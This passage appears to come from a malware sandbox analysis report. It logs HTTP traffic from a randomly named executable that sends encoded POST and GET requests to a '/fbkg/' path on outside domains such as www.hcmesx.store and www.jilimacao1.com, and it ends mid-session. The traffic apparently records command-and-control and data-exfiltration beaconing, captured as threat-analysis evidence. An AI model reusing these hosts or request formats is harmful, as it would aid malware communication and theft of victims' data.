                                                                                                                                                                                                Nov 17, 2023 19:32:45.810094118 CET1488OUTData Raw: 53 38 73 38 77 58 64 4b 6e 45 53 2f 33 56 48 6f 67 6a 33 6a 34 50 65 57 46 64 75 58 62 37 4f 4b 54 36 50 31 78 58 77 71 59 78 77 7a 2b 68 65 6e 64 58 56 30 36 43 59 55 59 45 45 4b 62 43 34 4d 64 38 7a 41 32 4e 38 46 4a 59 2f 6c 30 63 4e 33 72 57
                                                                                                                                                                                                Data Ascii: S8s8wXdKnES/3VHogj3j4PeWFduXb7OKT6P1xXwqYxwz+hendXV06CYUYEEKbC4Md8zA2N8FJY/l0cN3rWlQ6eLvuT0QqsOZr+PGCyujxnvkzjt3vCNWbd7G+rAqib0DlHju25jw8zc/9pPmUcdfLZMK0Gdjuert9HyRA/dMTcGzY8vAGLrNI1NJtlfHjwf82czZw3tJCv/083FITxhefj8npX6Egwv4qjCNhoUdEbV8cTwQsY9
                                                                                                                                                                                                Nov 17, 2023 19:32:45.810164928 CET1490OUTData Raw: 4a 38 33 65 59 50 62 61 61 44 6f 42 59 72 6d 6a 6e 36 71 61 62 4a 71 38 31 77 53 59 48 42 72 32 31 64 58 33 70 5a 73 77 43 36 6e 4d 39 65 35 70 61 79 74 34 77 30 74 57 43 78 7a 4d 72 46 45 6d 74 71 4b 4f 6b 6f 31 4e 4a 38 6a 46 54 37 36 75 46 43
                                                                                                                                                                                                Data Ascii: J83eYPbaaDoBYrmjn6qabJq81wSYHBr21dX3pZswC6nM9e5payt4w0tWCxzMrFEmtqKOko1NJ8jFT76uFCFDcUCLivRRQuQddCPoEaZYQ+beFFBwZkG/voUh4PvrQQRhhdPj7MuE+3T15Dy3FIdVQxTtlXPKNRIwf6jLirhd/TBYCkUnkYd6MSBVMzeT+kj4EAOhJNzCFTPiJ/5QtBvhUVyvtfAaCGFRaqLI+FtYxMAJKAnHixy
                                                                                                                                                                                                Nov 17, 2023 19:32:46.147248983 CET1497OUTData Raw: 38 64 71 6c 43 34 59 72 53 71 5a 33 59 54 32 49 58 78 6d 45 65 5a 7a 4a 79 50 6b 4d 65 4b 4a 4c 4d 6f 7a 2f 30 48 36 70 75 47 63 36 32 49 6e 39 54 7a 67 78 76 6d 46 53 4b 54 64 70 47 69 68 67 66 4b 43 4e 76 77 38 50 4d 2f 35 48 65 42 56 79 2f 59
                                                                                                                                                                                                Data Ascii: 8dqlC4YrSqZ3YT2IXxmEeZzJyPkMeKJLMoz/0H6puGc62In9TzgxvmFSKTdpGihgfKCNvw8PM/5HeBVy/YFp9MhAILwe2lXL1zX6FD2tcvYTQjyOfInkJ8Raqt+VWP0/6zI2kg1yF6hrFQUg6SKhzayllduuuSgVKfmYPurMrUe6IIQ4e7g00nxPpAblPve7pxqgeRiqs8vruczlYolj7J5BO/NR5K/+qwC+cbQbw9kcq6ygor1
                                                                                                                                                                                                Nov 17, 2023 19:32:46.147344112 CET1507OUTData Raw: 53 4f 38 30 37 64 72 70 58 4d 34 32 5a 38 51 63 54 51 74 43 31 34 69 43 68 41 76 62 34 31 2f 71 2f 51 63 6e 34 75 48 6e 4b 69 56 76 35 32 33 65 4a 59 32 4e 44 44 30 43 34 58 67 66 7a 58 58 75 6d 70 43 34 68 46 48 47 67 51 6a 7a 31 58 61 75 72 49
                                                                                                                                                                                                Data Ascii: SO807drpXM42Z8QcTQtC14iChAvb41/q/Qcn4uHnKiVv523eJY2NDD0C4XgfzXXumpC4hFHGgQjz1XaurIjYIPF0UZ+XxBvUvZX32sd2nu3byPLm/EHLyQPEv+exgeBPHnzoALpJ727i59GOrq8L044bxh+GOGoR3JDF9jDdstUU1JSUrseWfia3deT/cSyk7pTazd1Ms+Sy4p+kL/uSAMhVqQ2T1Vm4wv1sPbD/OqqxbgptXWu
                                                                                                                                                                                                Nov 17, 2023 19:32:46.147433043 CET1513OUTData Raw: 68 43 37 35 2f 75 68 72 6c 37 4b 5a 67 46 77 74 2f 73 74 30 75 70 78 78 48 76 6e 4c 67 37 51 6c 78 33 54 67 64 75 41 53 4d 78 75 52 32 34 6c 63 46 56 70 34 48 55 2f 37 77 6a 79 31 5a 7a 6f 71 69 69 4d 39 4c 31 52 47 6d 35 70 71 63 42 4e 35 39 73
                                                                                                                                                                                                Data Ascii: hC75/uhrl7KZgFwt/st0upxxHvnLg7Qlx3TgduASMxuR24lcFVp4HU/7wjy1ZzoqiiM9L1RGm5pqcBN59sU/5WZBBxWa6lVk2pskggGeyusi1/qV/mmLmDR0tVvYRlZ0MTaTv70+4VduTyZZ1vnZhFKuhpb5umAyXDIQ3Rm+d/ZAXqJ/hwjs93ZtGe0IPEE1NdP9gSgXppRq/Z2qIp/wk8B6WyTS1d9Qp1cqyekCQjUu8ZIB1Fp
                                                                                                                                                                                                Nov 17, 2023 19:32:46.228158951 CET1514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:46 GMT
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                X-Cache: BYPASS
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                Nov 17, 2023 19:32:46.486005068 CET1516OUTData Raw: 49 2b 52 69 4f 41 58 2f 55 69 33 45 5a 6c 70 42 61 47 4e 57 6b 70 43 2f 43 64 59 76 33 44 37 58 5a 2f 62 4e 42 43 6e 33 33 78 44 4e 71 49 6d 53 4f 41 32 68 4d 34 61 4f 61 6e 6c 59 49 45 56 2f 42 73 47 42 69 73 68 4c 33 61 35 6d 45 4c 57 66 6d 42
                                                                                                                                                                                                Data Ascii: I+RiOAX/Ui3EZlpBaGNWkpC/CdYv3D7XZ/bNBCn33xDNqImSOA2hM4aOanlYIEV/BsGBishL3a5mELWfmBe9AGhGaT8elHM4uYYPw8R/Ua9gWQ+lJA+ejR/XzqxxzU8CdgTchrW13OXaIdMpfvSSjc1kgUi7H3llOFdf0K16KbtXT7se2A0BPBV34lfTH0U9pWCMFLIUJ8jcihQNsz49H321zMXABCWnNz6tfOjtVZMp3JeZZxP
                                                                                                                                                                                                Nov 17, 2023 19:32:46.486131907 CET1529OUTData Raw: 65 75 51 2f 6e 66 67 33 6b 59 73 4c 79 41 50 47 61 43 78 7a 59 59 52 47 55 75 43 48 53 61 33 38 78 73 51 76 51 71 68 6b 68 71 6f 30 48 2b 38 77 33 78 54 42 51 74 74 6e 66 77 4d 53 5a 63 6f 4c 70 68 32 36 4f 41 62 39 65 64 2f 30 43 31 53 77 75 6d
                                                                                                                                                                                                Data Ascii: euQ/nfg3kYsLyAPGaCxzYYRGUuCHSa38xsQvQqhkhqo0H+8w3xTBQttnfwMSZcoLph26OAb9ed/0C1SwumvwLhrnEGmqd3pSq6iXjNTPjdh57ifkIZrf0L+75SEty3Mb/bdhIN0/cNEjL/FK3NMZko3/o9/qro2+3f4DmOv6tPVSLKz+uVcNFP9YrVEHA60XQJk01SYdOQy+mJq/uFLzRetmGNiJvTj5zolip1+HC5NEI5kHTQe
                                                                                                                                                                                                Nov 17, 2023 19:32:46.486222982 CET1531OUTData Raw: 44 4e 48 73 73 4c 45 76 67 66 51 55 35 6b 6f 48 59 4e 31 35 4f 74 63 68 62 6c 6f 6c 44 75 56 51 38 78 33 4c 39 6b 61 4e 44 46 58 2f 46 53 59 52 33 75 41 63 72 41 4d 78 68 73 45 4d 45 6f 42 77 44 36 55 6b 41 61 6b 74 2f 79 75 43 32 4a 74 57 6d 71
                                                                                                                                                                                                Data Ascii: DNHssLEvgfQU5koHYN15OtchblolDuVQ8x3L9kaNDFX/FSYR3uAcrAMxhsEMEoBwD6UkAakt/yuC2JtWmqwmLH4uFNayIjyA25sldGB+/uSQCQBahbq5+VqTqXCeNkHPT62JzlCHQaImnu+LBNJnPEnb8WYrPmerXBnynK9furiMXvkAgk7dEj/JuHsKGMxi9aACYSZ5ShxSrW6BswaYoUtF6TBoKNXM/0p5gXMdGc4FErkIcXw
                                                                                                                                                                                                Nov 17, 2023 19:32:47.107601881 CET1533OUTData Raw: 78 64 4b 61 6b 73 34 76 7a 6c 70 4e 6d 72 72 31 59 77 34 45 57 33 47 36 54 54 73 52 59 68 6d 77 36 52 6c 72 58 51 73 35 73 78 4e 50 34 6a 31 49 52 32 6f 69 34 6e 66 51 65 35 70 72 66 62 52 2f 7a 61 53 48 4e 6c 71 48 4e 78 65 6b 6c 33 59 57 61 32
                                                                                                                                                                                                Data Ascii: xdKaks4vzlpNmrr1Yw4EW3G6TTsRYhmw6RlrXQs5sxNP4j1IR2oi4nfQe5prfbR/zaSHNlqHNxekl3YWa2g0pL7pBe2LkuwTe8F2KnL2geSNd+nM7E3S0AphPngl4hkyXfJtDixXkhDzLuGTFR2BwmXxss8W5404BZ/69Wv2ndBTKbLO2PwbHf3GDx3CXn15wrqDFeS+7t0W+7bicGvjE07hqRE0bc/HiNn74oXCsaRdhpD1U10


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                7934.126.191.8480192.168.11.2050206C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:49.694117069 CET1533OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=B4jXnyaFtGUXQHU1NUiYYX7LdOtFOQUBPe+H2lr5u+EXU2X7vOdtwTNWEAPrWdGRSj2hi/d9Wgql3m3h6BHCa8reqpnu7N6Iew== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.jilimacao1.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:32:50.107836962 CET1534INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:49 GMT
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                X-Cache: BYPASS
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                79192.168.11.205020634.126.191.8480C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:49.694117069 CET1533OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=B4jXnyaFtGUXQHU1NUiYYX7LdOtFOQUBPe+H2lr5u+EXU2X7vOdtwTNWEAPrWdGRSj2hi/d9Wgql3m3h6BHCa8reqpnu7N6Iew== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.jilimacao1.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:32:50.107836962 CET1534INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:49 GMT
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                X-Cache: BYPASS
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                8192.168.11.205013538.59.48.8680C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:38.839636087 CET366OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.hcmesx.store
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.hcmesx.store
                                                                                                                                                                                                Referer: http://www.hcmesx.store/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 73 6e 65 31 38 33 7a 70 35 41 69 7a 68 6d 30 66 37 5a 39 34 32 35 67 68 4b 58 5a 72 73 35 47 36 67 73 77 48 49 5a 68 4a 59 55 7a 39 56 32 6f 71 50 73 4a 38 68 42 36 49 75 4e 67 6a 35 75 73 56 55 33 72 64 41 6d 72 34 52 74 59 67 72 4b 77 75 4a 32 55 69 6c 73 7a 65 4e 54 4a 49 42 6f 49 4d 71 66 67 66 2f 51 4c 75 6f 6b 6e 2f 67 73 31 6d 7a 6f 2f 6f 37 4d 4c 75 41 77 54 61 79 50 46 67 38 43 62 73 72 4d 70 61 34 4c 39 4e 71 76 76 6a 56 69 44 4b 66 74 4d 36 4d 58 75 52 78 4a 71 7a 53 6f 57 65 4b 32 52 6e 42 64 41 37 4c 35 48 53 6e 6e 79 32 52 73 44 6c 73 75 6e 2f 68 54 59 37 67 2f 2b 79 73 52 72 79 47 48 55 52 46 68 61 43 45 35 69 5a 2f 39 58 48 70 77 4d 58 79 55 4e 65 72 48 44 55 6d 44 5a 69 53 74 6b 2b 78 78 52 76 65 75 39 63 71 4f 79 64 6a 64 48 46 75 59 47 59 6a 43 76 71 6e 48 44 72 45 31 4c 33 62 4f 4a 43 73 68 69 6d 33 68 67 38 78 66 76 4d 7a 68 63 42 4b 61 44 52 77 78 78 4c 4b 6a 2b 6e 52 4f 42 56 72 4d 71 42 2b 49 4a 45 4c 31 65 77 78 74 6b 71 33 66 31 5a 5a 41 56 4d 6b 54 38 33 50 68 4b 79 70 7a 55 44 70 42 7a 35 37 6b 37 57 4e 59 2f 6b 34 76 33 73 31 41 57 30 54 4e 38 2f 42 35 4a 67 52 50 59 31 46 56 5a 55 48 6d 43 4c 43 49 67 4f 4e 38 64 69 5a 43 6f 63 35 4f 6c 35 68 65 52 42 35 57 58 61 73 43 66 75 47 79 70 42 75 65 45 32 59 69 6c 2b 4e 6a 63 38 33 77 6a 37 6d 61 2f 77 41 73 66 6f 63 52 45 72 46 33 42 4f 2f 30 76 6d 42 55 78 52 52 54 47 50 44 63 6d 6e 76 42 42 30 54 77 61 66 6e 70 55 6a 69 6e 78 4e 2f 6a 66 4d 64 6d 35 6b 75 6a 57 7a 72 72 4c 46 55 4d 4b 58 6b 58 43 39 33 61 48 67 74 5a 76 59 57 65 63 78 48 37 6e 35 5a 6b 3d
                                                                                                                                                                                                Data Ascii: T6I=Esne183zp5Aizhm0f7Z9425ghKXZrs5G6gswHIZhJYUz9V2oqPsJ8hB6IuNgj5usVU3rdAmr4RtYgrKwuJ2UilszeNTJIBoIMqfgf/QLuokn/gs1mzo/o7MLuAwTayPFg8CbsrMpa4L9NqvvjViDKftM6MXuRxJqzSoWeK2RnBdA7L5HSnny2RsDlsun/hTY7g/+ysRryGHURFhaCE5iZ/9XHpwMXyUNerHDUmDZiStk+xxRveu9cqOydjdHFuYGYjCvqnHDrE1L3bOJCshim3hg8xfvMzhcBKaDRwxxLKj+nROBVrMqB+IJEL1ewxtkq3f1ZZAVMkT83PhKypzUDpBz57k7WNY/k4v3s1AW0TN8/B5JgRPY1FVZUHmCLCIgON8diZCoc5Ol5heRB5WXasCfuGypBueE2Yil+Njc83wj7ma/wAsfocRErF3BO/0vmBUxRRTGPDcmnvBB0TwafnpUjinxN/jfMdm5kujWzrrLFUMKXkXC93aHgtZvYWecxH7n5Zk=
                                                                                                                                                                                                Nov 17, 2023 19:26:39.007271051 CET367INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:26:39 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 31 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 52 c1 6e 13 31 10 bd f7 2b 8c 11 12 48 bb eb 4d ab 4a 68 b3 bb a8 0a 29 07 22 b5 aa c2 a1 27 e4 d8 26 eb 76 6d af ec 49 d2 50 55 e2 c2 5f 70 ab 8a b8 f4 ce a5 3f 53 51 c4 67 60 af 43 8b 2a f0 c5 7e 33 e3 f7 9e c7 53 3e 79 7d 30 9a 1e 1f 8e 51 03 aa ad b7 ca 3f 9b a0 dc 23 c7 ac ec 00 b1 86 5a 27 a0 c2 ef a6 fb e9 4b 8c 24 af f0 64 ef fd e8 60 32 19 8f a6 18 39 cb 2a 4c 88 e3 a7 d9 ee 20 6b 29 39 71 a9 07 69 67 4d a6 a4 ce 4e 1c ae 4b 12 c9 ee 59 eb c9 5e 26 b5 84 e7 e7 92 17 f8 ed 78 be 86 23 da 6e 2f f6 cd 0e 6c bf c1 09 3b fd 47 f4 e2 c5 03 0f 2a 95 00 fa d8 5c bd 85 fc 8a a9 e0 73 29 c5 aa 33 16 30 d2 54 89 bf 31 33 1a 84 f6 af 5a 49 0e 4d c5 c5 52 32 91 f6 20 f1 ae a5 5a a8 d4 31 da 8a 6a 90 e5 89 a2 67 8f 22 0b 27 6c 5f 40 67 be 46 1b ec a5 a3 38 48 68 45 fd f3 fa f2 ee cb b7 5f 37 37 77 9f af 7e 7c bf be fd f4 b5 24 31 13 ab 1c ac 7d 55 7f 0e 2b 74 3e 99 19 be 4e e4 07 eb ad 9e f7 4e 0a 34 c8 f3 67 c3 46 c8 79 03 1b d0 51 ce a5 9e 17 28 1f 2a 6a e7 52 fb d3 c5 3d cf d3 95 a5 dd ff 2f 3f 14 6e 64 66 c6 72 61 0b a4 8d 16 c3 98 f5 3d 8e de 4a d2 c4 41 08 be fc cf 71 b9 ec 3f 3f 48 84 e7 86 4e 47 9a 38 03 0d 40 e7 0a 42 f8 d9 5a c1 c7 7c 27 63 8c b0 8e e5 bb e4 95 9f 21 ad 45 3b 32 5c 54 7d 28 8c 44 bc eb 89 89 67 0e db 46 87 f4 63 f8 1b 64 53 ca f5 9d 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 1b7uRn1+HMJh)"'&vmIPU_p?SQg`C*~3S>y}0Q?#Z'K$d`29*L k)9qigMNKY^&x#n/l;G*\s)30T13ZIMR2 Z1jg"'l_@gF8HhE_77w~|$1}U+t>NN4gFyQ(*jR=/?ndfra=JAq??HNG8@BZ|'c!E;2\T}(DgFcdS0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                838.59.48.8680192.168.11.2050135C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:38.839636087 CET366OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.hcmesx.store
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.hcmesx.store
                                                                                                                                                                                                Referer: http://www.hcmesx.store/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
